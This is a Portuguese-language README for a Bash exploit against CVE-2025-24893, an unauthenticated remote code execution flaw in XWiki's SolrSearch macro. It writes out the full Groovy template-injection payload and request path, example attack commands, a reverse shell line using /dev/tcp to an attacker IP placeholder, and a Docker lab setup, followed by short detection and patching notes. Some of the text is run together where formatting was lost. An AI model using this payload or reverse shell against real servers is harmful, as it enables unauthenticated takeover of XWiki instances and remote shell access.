
Exploit em Bash para CVE-2025-24893, RCE não autenticado no XWiki Platform, usando injeção de template no macro SolrSearch para executar comandos arbitrários do sistema.
Este script é uma implementação em Bash reformulada de um exploit direcionado às versões do XWiki Platform afetadas pela CVE-2025-24893. Ele aproveita uma vulnerabilidade crítica de execução remota de código não autenticada que permite que atacantes executem código Groovy arbitrário através de uma falha de injeção de template no macro SolrSearch.
As implementações originais do exploit em Python foram criadas por vários pesquisadores de segurança e foram adaptadas aqui para usuários de Bash, com execução simplificada e usabilidade aprimorada.
text quando acessado via endpoint RSS de mídia, permitindo que atacantes injetem código Groovy malicioso no pipeline de renderização sem autenticação.curl: Para enviar requisições HTTP.jq: Para codificar o payload em URL.Conceda permissões de execução:
chmod +x CVE-2025-24893
Execute o script com os argumentos necessários:
./CVE-2025-24893 <url_alvo> <comando>
| Parâmetro | Descrição |
|---|---|
<url_alvo> | A URL do XWiki alvo (ex.: http://exemplo.com ou https://xwiki.exemplo.org). O protocolo é opcional. |
<comando> | O comando de sistema a ser executado no servidor alvo. |
Verificar se o alvo é vulnerável (executar comando id):
./CVE-2025-24893 http://xwiki-vulneravel.exemplo.com "id"
Obter informações do sistema:
./CVE-2025-24893 http://xwiki-vulneravel.exemplo.com "uname -a"
Criar um arquivo de teste:
./CVE-2025-24893 http://xwiki-vulneravel.exemplo.com "touch /tmp/pwned"
Reverse shell (substitua pelo seu IP e porta):
./CVE-2025-24893 http://xwiki-vulneravel.exemplo.com "bash -c 'bash -i >& /dev/tcp/SEU_IP/SUA_PORTA 0>&1'"
Interpretação dos Argumentos da Linha de Comando:
http:// se nenhum protocolo for especificado.Construção do Payload:
.execute().}}}{{async async=false}}{{groovy}}<código>{{/groovy}}{{/async}}Codificação URL:
jq para transmissão HTTP adequada.Exploração:
/xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload_codificado>A cadeia de exploração funciona da seguinte forma:
}}}{{async async=false}}{{groovy}}'<comando>'.execute();{{/groovy}}{{/async}}
}}} - Fecha qualquer contexto de macro existente{{async async=false}} - Garante execução síncrona{{groovy}}...{{/groovy}} - Envolve o código Groovy malicioso'<comando>'.execute(); - Executa o comando de sistema especificadoPara fins de teste, você pode configurar uma instância vulnerável do XWiki usando Docker:
docker run -d -p 8080:8080 --name xwiki-vulneravel xwiki:15.10.10
# Aguarde o XWiki iniciar (pode levar 1-2 minutos)
./CVE-2025-24893 http://localhost:8080 "whoami"
A exploração bem-sucedida desta vulnerabilidade permite que um atacante não autenticado:
De acordo com a CISA e múltiplos fornecedores de segurança:
Monitore requisições suspeitas ao endpoint SolrSearch:
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*
Procure por padrões contendo:
{{groovy}}{{async}}.execute()/tmp ou outros diretórios graváveisAtualize o XWiki para uma versão corrigida:
Aplique Soluções Temporárias (se a correção imediata não for possível):